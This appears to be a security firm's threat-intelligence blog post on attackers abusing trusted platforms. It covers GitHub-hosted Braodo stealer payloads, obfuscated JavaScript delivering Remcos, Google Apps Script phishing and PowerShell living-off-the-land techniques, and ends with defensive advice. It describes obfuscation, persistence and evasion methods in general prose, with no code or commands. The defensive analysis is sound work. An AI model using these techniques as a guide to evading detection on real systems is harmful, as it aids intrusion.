The Trust Hijack: How Cybercriminals Are Weaponizing Legitimate Platforms in 2025

The abuse of GitHub for malicious purposes represents one of the most sophisticated examples of trust hijacking observed in 2025. The Braodo stealer campaign demonstrates how threat actors can leverage GitHub’s global infrastructure, trusted reputation, and legitimate functionality to create highly effective attack chains that evade traditional security controls [1].

The technical sophistication of GitHub abuse campaigns extends far beyond simple payload hosting. Threat actors have developed comprehensive methodologies that exploit multiple aspects of the platform’s functionality. Repository creation and management techniques involve establishing seemingly legitimate repositories with convincing documentation and commit histories that can pass casual inspection. Content delivery optimization leverages GitHub’s global CDN infrastructure to ensure reliable payload delivery regardless of geographic location or network conditions. Version control exploitation uses Git’s branching and tagging features to manage different payload variants and campaign iterations.

The operational security benefits of GitHub abuse are substantial and explain why this approach has become increasingly popular among sophisticated threat actors. The platform’s legitimate reputation ensures that GitHub domains are rarely blocked by corporate firewalls or security filters. The massive scale of legitimate GitHub traffic provides excellent cover for malicious activities, making detection through traffic analysis extremely challenging. The platform’s reliability and uptime guarantees ensure that attack infrastructure remains available when needed. The global accessibility of GitHub content eliminates geographic restrictions that might affect traditional command and control infrastructure.

The Braodo stealer campaign specifically demonstrates advanced techniques for exploiting GitHub’s functionality while maintaining operational security. The initial payload delivery mechanism uses carefully crafted BAT files with misleading comments designed to complicate analysis and delay detection. The multi-stage download process leverages both github.com and raw.githubusercontent.com domains to distribute different components of the attack chain. The payload obfuscation techniques include disguising executable content as image files and using custom Base64 encoding to evade signature-based detection systems.

The persistence mechanisms employed in GitHub-based attacks show remarkable sophistication in maintaining long-term access while avoiding detection. Startup folder placement ensures that malicious payloads execute automatically when systems restart. Registry modifications create additional persistence mechanisms that survive system reboots and user logouts. File system manipulation includes strategic placement of payloads in directories that are less likely to be monitored or scanned by security tools. Cleanup procedures automatically remove initial attack artifacts to reduce the forensic footprint and complicate incident response efforts.

The evolution of JavaScript-based attacks in 2025 demonstrates how legitimate web technologies can be weaponized to create highly sophisticated and evasive malware delivery mechanisms. The control-flow flattening techniques observed in recent Remcos delivery campaigns represent a significant advancement in obfuscation technology that challenges traditional static analysis approaches [1].

Control-flow flattening represents a particularly insidious form of code obfuscation that transforms the natural structure of JavaScript programs into complex, difficult-to-analyze forms. The technique works by replacing the normal control flow of a program with a state machine that uses arrays of strings and numbers in while loops until calculated checksums match predefined values. This approach forces static analysis tools to execute the obfuscated code rather than simply parsing its structure, significantly increasing analysis time and complexity.

The implementation of control-flow flattening in malicious JavaScript demonstrates sophisticated understanding of both programming techniques and security evasion methodologies. Self-invoking functions create isolated execution contexts that complicate debugging and analysis efforts. Array manipulation techniques use complex mathematical operations to determine execution flow, making it extremely difficult to predict program behavior without full execution. Checksum validation ensures that the obfuscated code executes correctly while preventing simple deobfuscation attempts. Loop-based execution models create performance overhead that can be used to detect analysis environments and sandbox systems.

The payload delivery mechanisms employed in these JavaScript attacks show remarkable sophistication in exploiting legitimate system functionality. ActiveXObject abuse leverages Windows Script Host functionality to execute PowerShell commands without triggering traditional process monitoring alerts. WebClient object manipulation uses legitimate .NET functionality to download additional payloads from remote servers. MSBuild exploitation leverages Microsoft’s build engine to execute malicious code in a trusted context. Multi-stage execution chains distribute attack components across multiple files and processes to complicate detection and analysis.

The integration of JavaScript attacks with broader campaign infrastructure demonstrates advanced operational planning and execution capabilities. Command and control communication often leverages legitimate web services and APIs to avoid detection by network monitoring systems. Payload staging uses multiple download locations and backup mechanisms to ensure reliable delivery even if some infrastructure is discovered and blocked. Environmental awareness includes techniques for detecting analysis environments, virtual machines, and sandbox systems that might be used by security researchers. Anti-forensics capabilities include log deletion, artifact cleanup, and evidence destruction mechanisms that complicate incident response efforts.

The abuse of cloud platforms for malicious purposes represents a particularly concerning trend that exploits the fundamental trust relationships organizations have with major technology providers. The recent campaigns leveraging Google Apps Script for phishing operations demonstrate how cloud-based development platforms can be transformed into sophisticated attack infrastructure [3].

Google Apps Script abuse campaigns show remarkable sophistication in exploiting the platform’s legitimate functionality for malicious purposes. The creation of fraudulent login pages using Google’s trusted infrastructure ensures that phishing sites benefit from the company’s reputation and security certifications. The use of Google’s global content delivery network provides reliable access to malicious content regardless of geographic location or network conditions. The integration with other Google services creates opportunities for data exfiltration and persistence that are difficult to detect using traditional monitoring approaches.

The technical implementation of cloud platform abuse demonstrates advanced understanding of both the platforms’ capabilities and their security limitations. API exploitation involves using legitimate application programming interfaces in ways that were not intended by the platform designers. Service integration leverages connections between different cloud services to create complex attack chains that span multiple platforms and providers. Authentication bypass techniques exploit weaknesses in platform security models to gain unauthorized access to resources and functionality. Data exfiltration mechanisms use legitimate data transfer capabilities to steal sensitive information without triggering traditional data loss prevention systems.

The operational advantages of cloud platform abuse extend beyond simple evasion capabilities to encompass fundamental changes in attack economics and scalability. The elimination of infrastructure costs allows threat actors to conduct large-scale campaigns without significant upfront investment. The global scalability of cloud platforms enables attacks that can reach victims worldwide without geographic limitations. The reliability and uptime guarantees provided by major cloud providers ensure that attack infrastructure remains available when needed. The legitimate appearance of cloud-based attacks makes them extremely difficult to distinguish from normal business operations.

The persistence and expansion capabilities enabled by cloud platform abuse create long-term threats that can be extremely difficult to detect and remediate. Account takeover techniques allow threat actors to gain persistent access to cloud resources using legitimate credentials. Service proliferation involves creating multiple interconnected services across different platforms to ensure continued access even if some components are discovered. Data synchronization mechanisms automatically replicate stolen information across multiple cloud storage services to prevent data loss. Backup and recovery systems ensure that attack infrastructure can be quickly restored if discovered and disrupted.

Living Off The Land (LOTL) attacks represent a fundamental shift in cybercriminal methodology that has reached unprecedented sophistication in 2025. The statistic that 84% of major cyberattacks now utilize LOTL techniques demonstrates how thoroughly this approach has transformed the threat landscape [2]. Rather than deploying custom malware that can be easily detected and analyzed, threat actors are weaponizing the legitimate tools and platforms that organizations rely upon for daily operations.

The core philosophy behind LOTL attacks involves exploiting the inherent trust that organizations place in legitimate software, platforms, and services. This approach offers numerous advantages over traditional malware deployment including reduced detection risk, improved reliability, enhanced persistence capabilities, and exploitation of existing trust relationships. The sophistication of modern LOTL campaigns demonstrates that threat actors have developed comprehensive methodologies for identifying, exploiting, and weaponizing legitimate functionality across the entire technology stack.

The technical implementation of LOTL attacks requires deep understanding of both target environments and the legitimate tools available within those environments. System administration tools like PowerShell, WMI, and PsExec provide powerful capabilities for system manipulation and remote access that can be leveraged for malicious purposes. Development platforms and frameworks offer opportunities for code execution and payload delivery that appear completely legitimate to security monitoring systems. Cloud services and APIs provide scalable infrastructure for command and control operations that benefit from the reputation and reliability of major technology providers.

The operational security benefits of LOTL approaches extend beyond simple evasion to encompass fundamental changes in how threat actors plan and execute their campaigns. The elimination of custom malware reduces the forensic footprint of attacks and complicates attribution efforts. The use of legitimate tools makes it extremely difficult to distinguish between authorized and unauthorized activities. The exploitation of trusted platforms ensures that attack traffic blends seamlessly with normal business operations. The leveraging of existing infrastructure eliminates the need for threat actors to maintain their own command and control systems.

PowerShell has emerged as one of the most frequently abused legitimate tools in modern cyberattacks, offering threat actors a powerful and flexible platform for conducting sophisticated operations while maintaining the appearance of legitimate system administration activities. The integration of PowerShell into Windows environments and its extensive capabilities make it an ideal target for LOTL exploitation.

The technical capabilities of PowerShell that make it attractive to threat actors are extensive and continue to expand with each new version of the platform. Remote execution capabilities allow attackers to run commands on multiple systems simultaneously without deploying additional software. Object manipulation features provide powerful tools for interacting with system components, registry entries, and network resources. Scripting functionality enables the creation of complex, multi-stage attack sequences that can adapt to different environments and conditions. Integration with .NET Framework provides access to extensive programming libraries and system functionality.

The obfuscation techniques employed in PowerShell-based attacks have reached remarkable levels of sophistication, making detection and analysis extremely challenging for security teams. Encoding mechanisms use various character sets and compression algorithms to disguise malicious commands. Variable substitution techniques create dynamic code that changes with each execution. Function aliasing replaces standard PowerShell commands with custom names that can evade signature-based detection. Reflection-based loading allows attackers to execute code directly in memory without creating files on disk.

The persistence mechanisms available through PowerShell exploitation provide threat actors with numerous options for maintaining long-term access to compromised systems. Registry modification capabilities enable the creation of persistent startup mechanisms that survive system reboots. Scheduled task creation allows for the execution of malicious code at predetermined times or in response to specific system events. WMI event subscription provides a stealthy method for triggering malicious activities based on system conditions. Service installation capabilities enable the deployment of persistent backdoors that appear as legitimate system services.

The integration of PowerShell attacks with broader campaign infrastructure demonstrates advanced operational planning and execution capabilities. Command and control communication often leverages legitimate web services and APIs to avoid detection by network monitoring systems. Payload staging uses PowerShell’s download capabilities to retrieve additional components from remote servers. Environmental reconnaissance employs PowerShell’s extensive system information gathering capabilities to profile target environments. Lateral movement techniques use PowerShell’s remote execution features to spread across network environments.

The integration of LOTL techniques with legitimate platforms represents the most sophisticated evolution of this attack methodology, creating hybrid approaches that combine the evasion benefits of legitimate tool abuse with the scalability and reliability of trusted infrastructure. This integration has reached unprecedented levels of sophistication in 2025, with threat actors developing comprehensive frameworks for exploiting multiple platforms simultaneously.

The strategic advantages of platform integration extend beyond simple evasion to encompass fundamental improvements in attack reliability, scalability, and persistence. Multi-platform redundancy ensures that attacks can continue even if some components are discovered and disrupted. Cross-platform data synchronization enables comprehensive data exfiltration that spans multiple services and providers. Integrated authentication mechanisms leverage single sign-on and federated identity systems to gain access to multiple resources with minimal credentials. Distributed command and control architectures use multiple platforms to create resilient communication channels that are extremely difficult to disrupt.

The technical implementation of platform integration requires sophisticated understanding of how different services interact and can be chained together to create complex attack sequences. API integration involves connecting multiple platforms through their application programming interfaces to create seamless attack workflows. Service mesh architectures use multiple interconnected platforms to distribute attack components and ensure redundancy. Data flow orchestration manages the movement of information between different platforms and services. Authentication federation leverages trust relationships between platforms to expand access beyond initial compromise points.

The operational benefits of platform integration create significant challenges for security teams attempting to detect and respond to these attacks. The distributed nature of integrated attacks makes it extremely difficult to identify all components of an attack campaign. The use of legitimate platforms for each component ensures that individual activities appear normal and authorized. The redundancy built into integrated approaches means that disrupting some components may not significantly impact overall attack effectiveness. The complexity of integrated attacks requires specialized expertise and tools that many organizations lack.

The emergence of trust hijacking and LOTL attacks has exposed fundamental limitations in traditional cybersecurity approaches that were designed for a threat landscape dominated by clearly malicious infrastructure and custom malware. Organizations that continue to rely on these traditional models find themselves increasingly vulnerable to sophisticated attacks that operate within their trusted ecosystem.

Signature-based detection systems, which form the backbone of many security programs, are rendered largely ineffective against attacks that leverage legitimate platforms and tools. These systems rely on identifying known malicious patterns, file hashes, and network indicators that simply do not exist when attacks use trusted infrastructure. The dynamic and polymorphic nature of modern LOTL attacks further complicates signature-based detection, as attack components can change with each execution while maintaining the same functional objectives.

Reputation-based filtering and blocking mechanisms face similar challenges when confronted with attacks that originate from highly trusted platforms like GitHub, Google, or Microsoft services. Organizations cannot simply block access to these platforms without severely impacting business operations, creating a fundamental tension between security and operational requirements. The global scale and legitimate usage of these platforms make it extremely difficult to distinguish between authorized and unauthorized activities using traditional reputation-based approaches.

Network-based detection systems that focus on identifying malicious traffic patterns and command and control communications struggle with attacks that leverage legitimate web services and APIs for their operations. The encryption and authentication mechanisms employed by legitimate platforms make it extremely difficult to inspect traffic content for malicious indicators. The massive volume of legitimate traffic to these platforms provides excellent cover for malicious activities, making statistical analysis and anomaly detection significantly more challenging.

Endpoint protection systems that rely on behavioral analysis of processes and file system activities face unique challenges when dealing with LOTL attacks that use legitimate system tools and processes. The challenge lies in distinguishing between authorized administrative activities and malicious exploitation of the same tools and processes. The legitimate nature of the tools being used means that traditional process monitoring and behavioral analysis approaches may not trigger alerts, allowing attacks to proceed undetected.

The detection of trust hijacking and LOTL attacks requires a fundamental shift toward behavioral analysis approaches that can identify malicious activities based on context, patterns, and deviations from normal operations rather than relying on known malicious indicators. This shift represents one of the most significant challenges facing cybersecurity professionals in 2025.

User behavior analytics must evolve to encompass not just traditional user activities but also the ways in which users interact with legitimate platforms and services. This includes monitoring for unusual patterns in cloud service usage, unexpected access to development platforms, and abnormal data transfer activities that might indicate compromise or misuse. The challenge lies in establishing accurate baselines for normal behavior while accounting for the legitimate variability in how different users and roles interact with these platforms.

Process behavior analysis requires sophisticated understanding of how legitimate tools and processes should behave in different contexts and environments. This includes monitoring for unusual command-line arguments, unexpected network connections, and abnormal file system activities that might indicate malicious use of legitimate tools. The development of effective process behavior analysis capabilities requires extensive knowledge of both the legitimate functionality of system tools and the ways in which they can be abused for malicious purposes.

Network behavior analysis must focus on identifying patterns and anomalies in how systems and users interact with legitimate platforms and services. This includes monitoring for unusual data transfer volumes, unexpected API usage patterns, and abnormal authentication activities that might indicate compromise or abuse. The challenge lies in developing analytical capabilities that can distinguish between legitimate business activities and malicious exploitation of the same platforms and services.

Platform-specific behavior analysis requires deep understanding of how different legitimate platforms and services are typically used within organizational environments. This includes monitoring for unusual repository activities on development platforms, unexpected script execution on cloud services, and abnormal data access patterns on collaboration platforms. The development of effective platform-specific analysis capabilities requires ongoing research and intelligence gathering about how these platforms can be abused for malicious purposes.

The rise of trust hijacking attacks necessitates a fundamental reimagining of zero trust principles to address the unique challenges posed by attacks that leverage legitimate platforms and services. Traditional zero trust implementations focus primarily on user and device verification, but the new threat landscape requires extending these principles to encompass platform and service interactions as well.

Platform verification mechanisms must be developed to continuously validate that legitimate platforms and services are being used for authorized purposes. This includes implementing behavioral monitoring for platform interactions, establishing baseline patterns for normal platform usage, and developing alerting mechanisms for unusual or suspicious platform activities. The challenge lies in balancing security requirements with the operational flexibility that makes these platforms valuable for business operations.

Service interaction monitoring must provide comprehensive visibility into how users and systems interact with legitimate platforms and services. This includes monitoring API usage patterns, tracking data transfer activities, and analyzing authentication and authorization patterns across different platforms. The goal is to identify activities that, while individually legitimate, may collectively indicate malicious intent or compromise.

Contextual access controls must consider not just user identity and device health but also the specific ways in which legitimate platforms and services are being accessed and used. This includes implementing dynamic access controls that can adapt based on usage patterns, establishing approval workflows for high-risk platform activities, and developing automated response capabilities for suspicious platform interactions.

Continuous verification principles must be extended to encompass ongoing validation of platform and service usage throughout the duration of user sessions and activities. This includes implementing real-time monitoring of platform interactions, developing capabilities for dynamic risk assessment based on platform usage patterns, and establishing mechanisms for automatically adjusting access controls based on changing risk profiles.

The effective response to trust hijacking threats requires organizations to develop new capabilities and expertise that go beyond traditional cybersecurity skills and knowledge. This capability development must encompass technical, analytical, and operational domains to address the full spectrum of challenges posed by these sophisticated attacks.

Platform expertise development must ensure that security teams have deep understanding of how legitimate platforms and services function, how they can be abused for malicious purposes, and how to effectively monitor and secure their usage. This includes training security personnel on platform-specific security features, developing expertise in platform abuse techniques, and establishing relationships with platform providers for security collaboration and intelligence sharing.

Behavioral analysis capabilities must be developed to enable security teams to identify subtle patterns and anomalies that might indicate malicious platform usage. This includes training analysts in advanced data analysis techniques, developing expertise in behavioral modeling and anomaly detection, and establishing processes for continuous refinement of behavioral analysis capabilities based on emerging threats and attack techniques.

Threat hunting expertise must be expanded to encompass the unique challenges posed by attacks that leverage legitimate infrastructure and platforms. This includes developing expertise in advanced hunting techniques, establishing processes for hypothesis-driven threat discovery, and creating capabilities for proactive threat identification that can stay ahead of evolving attack methodologies.

Incident response capabilities must be adapted to address the unique challenges posed by incidents that involve legitimate platforms and services. This includes developing expertise in platform-specific forensics and investigation techniques, establishing relationships with platform providers for incident response collaboration, and creating processes for coordinating response activities across multiple platforms and services.

The trust hijacking phenomenon observed throughout June 2025 represents more than a tactical evolution in cybercriminal methodology; it constitutes a fundamental transformation of the threat landscape that challenges the core assumptions underlying traditional cybersecurity approaches. The sophistication demonstrated in campaigns leveraging GitHub, Google Apps Script, and other legitimate platforms reveals that threat actors have successfully adapted to defensive countermeasures by weaponizing the very infrastructure organizations depend upon for daily operations.

The statistics speak to the magnitude of this transformation: with 84% of major cyberattacks now utilizing Living off the Land techniques, organizations can no longer afford to treat platform abuse as an edge case or emerging threat. This has become the dominant attack methodology, requiring immediate and comprehensive response from security teams worldwide. The campaigns analyzed in June 2025 demonstrate that threat actors have moved beyond simple platform abuse to develop sophisticated, multi-stage attack frameworks that integrate multiple legitimate services into cohesive and highly effective attack chains.

At Tranchulas, our analysis of these emerging threats reinforces our long-standing belief that the most dangerous attacks are those that exploit trust relationships and legitimate infrastructure. The organizations that will successfully defend against trust hijacking attacks are those that recognize the fundamental shift in the threat landscape and adapt their security strategies accordingly. This adaptation requires more than simply deploying new tools or technologies; it demands a comprehensive rethinking of security architecture, processes, and organizational capabilities.

The path forward requires organizations to embrace behavioral analysis, zero trust principles, and advanced threat hunting capabilities while maintaining the operational flexibility that makes legitimate platforms valuable for business operations. The challenge lies not in abandoning these platforms but in developing the sophisticated monitoring, analysis, and response capabilities necessary to distinguish between legitimate and malicious usage patterns.

The trust hijacking trend also highlights the critical importance of collaboration between organizations, security vendors, and platform providers in addressing these emerging threats. No single organization can effectively combat attacks that leverage the global infrastructure of major technology companies. Success requires coordinated efforts to develop detection capabilities, share threat intelligence, and implement platform-level security improvements that can benefit the entire ecosystem.

The cybersecurity industry stands at a critical juncture where traditional approaches must evolve to address a fundamentally transformed threat landscape. Organizations that continue to rely on signature-based detection, reputation filtering, and perimeter-focused security models will find themselves increasingly vulnerable to sophisticated attacks that operate within their trusted ecosystem. The time for incremental improvements has passed; what is required now is transformational change in how organizations approach cybersecurity in an era where trust itself has become weaponized.

The future belongs to organizations that can successfully balance the operational benefits of legitimate platforms with the security requirements necessary to detect and prevent their abuse. This balance requires sophisticated understanding of both the platforms themselves and the ways in which they can be exploited, combined with the analytical capabilities necessary to identify malicious activities within the vast ocean of legitimate platform usage. The organizations that master this balance will not only survive the trust hijacking era but will emerge stronger and more resilient than ever before.

[1] ANY.RUN. (2025, June 26). Top 3 Cyber Attacks in June 2025: GitHub Abuse, Control Flow Flattening, and More. Retrieved from https://medium.com/@anyrun/top-3-cyber-attacks-in-june-2025-github-abuse-control-flow-flattening-and-more-759bf170ccd8

[2] Redbot Security. (2025, June 4 ). Living Off the Land (LotL) Attacks Explained. Retrieved from https://redbotsecurity.com/living-off-the-land-lotl-attacks-explained/

[3] Cybersecurity Insiders. (2025, June 2 ). Weekly Top 10: Threat Actors Abuse Google Apps Script in Evasive Phishing Attacks. Retrieved from https://innovatecybersecurity.com/security-threat-advisory/weekly-top-10-06-02-2025-threat-actors-abuse-google-apps-script-in-evasive-phishing-attacks-cybercriminals-camouflaging-threats-as-ai-tool-installers-mark-your-calendar-apt41-innovative-tactics/